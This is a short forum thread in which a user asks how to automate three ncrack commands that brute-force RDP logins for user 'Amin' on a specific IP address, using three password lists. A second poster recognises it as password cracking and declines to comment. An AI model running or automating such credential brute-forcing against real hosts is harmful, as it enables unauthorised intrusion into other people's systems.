how to run automaticaly multiple syntax using cmd.exe


  1. Posts : 73
    windows xp c86
       #1

    how to run automaticaly multiple syntax using cmd.exe


    how to run this? one by one
    I open cmd.exe and i paste manually that code one by one how to run this 3 string automatically in a batch file?
    After 1'st list finishing starts the second and then starting the 3'rd
    ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
    ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
    ncrack -v --user Amin -P super3.txt 5.2.182.200:3389


    i tried this but not good results

    echo@off
    start /wait ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
    start /wait ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
    start /wait ncrack -v --user Amin -P super3.txt 5.2.182.200:3389
      My Computer


  2. Posts : 5,092
    Windows 7 32 bit
       #2

    Would this be the ncrack that is the password cracker? If so I don't think I can comment.
      My Computer


 

  Related Discussions
Our Sites
Site Links
About Us
Windows 7 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 7" and related materials are trademarks of Microsoft Corp.

© Designer Media Ltd
All times are GMT -5. The time now is 17:11.
Find Us